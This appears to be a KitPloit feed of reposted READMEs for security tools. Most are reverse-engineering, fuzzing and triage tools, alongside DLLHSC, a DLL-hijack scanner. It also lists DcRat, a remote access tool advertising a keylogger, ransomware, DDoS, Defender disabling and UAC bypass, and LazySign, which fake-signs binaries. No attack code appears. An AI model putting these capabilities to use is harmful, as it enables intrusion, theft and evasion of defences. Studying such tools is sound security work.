โŒ
There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

DLLHSC - DLL Hijack SCanner, A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

By: Zion3R
15 March 2021 at 11:30


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and, last but not least, the compiled executables for the x86 and x64 architectures (in the Releases section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. DLLHSC implements the core functionality of this tool. The detour project generates the DLL used to hook APIs, and the payload project generates the DLL that is used as a proof of concept to check whether the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory as DLLHSC and detour, named payload32.dll for the x86 architecture and payload64.dll for x64.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred to in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) that is not already present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL, upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports whether the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may pop up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they show up and reports the results.
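A minimal example invocation of this mode, based on the synopsis in the help menu further down (the target path here is purely hypothetical):

dllhsc.exe -e "C:\Program Files\ExampleApp\app.exe" -l -t 15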


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool reports only the modules that are loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check whether the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded at run-time.

Each time the scanned application calls LoadLibrary or LoadLibraryEx, the tool intercepts the call and writes the requested module to the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If LoadLibraryEx is called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules the loader applies the normal search order).
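A minimal example invocation of this mode (again with a hypothetical target path); the intercepted module names end up in the DLLHSCRTLOG.tmp file described above and are printed when the run finishes:

dllhsc.exe -e "C:\Program Files\ExampleApp\app.exe" -rt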


Compile and Run Guidance

Should you choose to compile the tool from source, it is recommended to do so with Visual Studio Community 2019. In order for the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the payload project has to be renamed to payload32.dll for the 32-bit architecture or payload64.dll for the 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait for checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples of how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error message box when the dependencies of the payload DLL (exported functions) are not met. DLLHSC by default checks for 10 seconds whether a message box was opened, or for as many seconds as specified by the user with the flag -t. An error message box indicates that, if the dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.exe loads the payload DLL:



The tool waits for a maximum timeframe of 10 seconds (or the number of seconds specified with -t) to make sure process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that neither belong to the KnownDLLs list nor are WinSxS dependencies. This mode aims to give an idea of the DLLs that may be used as payloads and exists only to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

By: Zion3R
26 March 2021 at 11:30


This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder on your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.



Php_Code_Analysis - Scan your PHP code for vulnerabilities


This script will scan your code.

The script can find:

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> scan a single file
python code.py >>> scan the full current folder (.)
python code.py <path> >>> scan the full given folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding to your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file, in this case example.exe.Hashes.csv.
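Assuming the other headless tools follow the same invocation pattern, exporting the hashes of the same binary as YARA signatures might look something like this (a sketch, not taken verbatim from the Kaiju documentation):

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2yara example.exe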

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update (git pull) your AUTOCATS clone whenever you pull the latest Kaiju source code, to ensure the two stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the auto-remove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

By: Zion3R
12 July 2021 at 21:30


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be retrieved through a link
  • Multi-server, multi-port support
  • Plugin system through DLLs, which provides strong extensibility
  • Super tiny client size (about 40~50K)
  • Data transfer with msgpack (more compact than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: VS2019
  • Runtime:

    Project               Runtime
    Server                .NET Framework 4.61
    Client and others     .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealers (only Chrome and Edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • …

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files

By: Zion3R
23 August 2021 at 21:30


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capable of stealing or forging fake signatures for binary files. All of these tools, however, have additional dependencies which require Go, Python, etc.


This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\_(ツ)_/¯



Karta - Source Code Assisted Fast Binary Matching Plugin For IDA

By: Zion3R
11 September 2021 at 11:30


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that its main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (number of functions in the open source) instead of N (size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported in versions v2.0.0 and above.
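A minimal sketch of that installation flow (the repository URL is left as a placeholder, and the directory name is assumed to match the repository name):

git clone <karta repository URL>
cd Karta
python setup.py install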


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the existing (supported) open source libraries within the binary. No more need to reverse engineer the same open-source library again and again; simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29, for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source uses external functions (memcpy, fread, or zlib_inflate), Karta will attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure from the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library

By: Zion3R
12 September 2021 at 20:30


AutoHarness is a tool that automatically generates fuzzing harnesses for you. The idea stems from a recurring problem in fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep into the library. It is very hard or sometimes even impossible for smart fuzzers to reach that codepath. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered in fuzzing. Hence, this program tries to alleviate this problem in some capacity as well as provide a tool that security researchers can use to initially test a code base. This program only supports code bases which are coded in C and C++.


Setup/Demonstration

This program utilizes llvm and clang for libfuzzer, Codeql for finding functions, and python for the general program. This program was tested on Ubuntu 20.04 with llvm 12 and python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief;   # subprocess, os, argparse and ast ship with the Python standard library and do not need to be installed via pip

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results:

It is definitely possible to raise the success rate by further debugging the compilation, adding more header files, and so on. Note that the nginx project does not have any shared objects after compiling. However, this program has a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way implemented in the program to fuzz functions with multiple arguments is by using a fuzzing data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem I came across when coding this is with CodeQL and nested structs. It becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  2. Implementation Based Harness Creation

Using CodeQL, it is possible to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for implementations of the function that exist in the library and use that information to make an educated guess on an implementation of the function as a harness. The problem I currently have with this is generating the control flow graphs with CodeQL.


  3. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and see if each is a valid bug or just an implementation bug. Also, you can enable the debug mode if some functions are not compiling. This will help you understand if there are some header files that you are missing or any linkage issues. If the project you are working on does not have shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


AFLTriage - Tool To Triage Crashing Input Files Using A Debugger

By: Zion3R
9 December 2021 at 20:30


AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging crashes generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.

Some notable features include:

  • Multiple report formats: text, JSON, and raw debugger JSON
  • Parallel crash triage
  • Crash deduplication
  • Sanitizer report parsing
  • Supports binary targets with or without symbols/debugging information
  • Source code and variables will be annotated in reports for context

Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitability. Accurate exploitability classification is very target and scenario specific and is best left to specialized tools and expert analysts.


Usage

Usage of AFLTriage is quite straightforward. You need your inputs to triage, an output directory for reports, and the binary and its arguments to triage.

Example:

$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@
AFLTriage v1.0.0

[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))
[+] Image triage cmdline: "./target_binary --option-one @@"
[+] Reports will be output to directory "reports"
[+] Triaging AFL directory fuzzing_directory/ (41 files)
[+] Triaging 41 testcases
[+] Using 24 threads to triage
[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)
[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]

Similar to AFL, the @@ is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.
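As a further illustration, and assuming the flags behave as described in the usage output below, a run that feeds each testcase to the target over stdin and writes both text and JSON reports might look like this (the input and binary paths are hypothetical):

$ afltriage -i crashes/ -o reports --stdin --report-formats text,json ./target_binary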

Building and Running

You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:

cd afltriage-rs/
cargo run --help

<compilation>

Finished dev [unoptimized + debuginfo] target(s) in 0.33s
Running `target/debug/afltriage --help`

<AFLTriage usage>
...

Extended Usage

afltriage 1.0.0
Quickly triage and summarize crashing testcases

USAGE:
afltriage -i <input>... -o <output> <command>...

OPTIONS:
-i <input>...
A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to
be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the
last argument passed to AFLTriage -- this is reserved for the command.
-o <output>
The output directory for triage report files. Use '-' to print entire reports to console.

-t, --timeout <timeout>
The timeout in milliseconds for each testcase to triage. [default: 60000]

-j, --jobs <jobs>
How many threads to use during triage.

--report-formats <report_formats>...
The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible
values: text, json, rawjson]
--bucket-strategy <bucket_strategy>
The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,
first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]
--child-output
Include child output in triage reports.

--child-output-lines <child_output_lines>
How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not
recommended). [default: 25]
--stdin
Provide testcase input to the target via stdin instead of a file.

--profile-only
Perform environment checks, describe the inputs to be triaged, and profile the target binary.

--skip-profile
Skip target profiling before input processing.

--debug
Enable low-level debugging output of triage operations.

-h, --help
Prints help information

-V, --version
Prints version information


ARGS:
<command>...
The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or
--stdin. Optionally use -- to delimit the start of the command.

Related Projects



Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers

By: Zion3R
3 March 2022 at 11:30


Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.


It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumentation capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For network fuzzing, the Mutiny fuzzer also works well if you have PCAPs to replay, and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.

./ and give your target... a lite fuzz.

$ sudo apt install latex2rtf

$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details

This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.

why

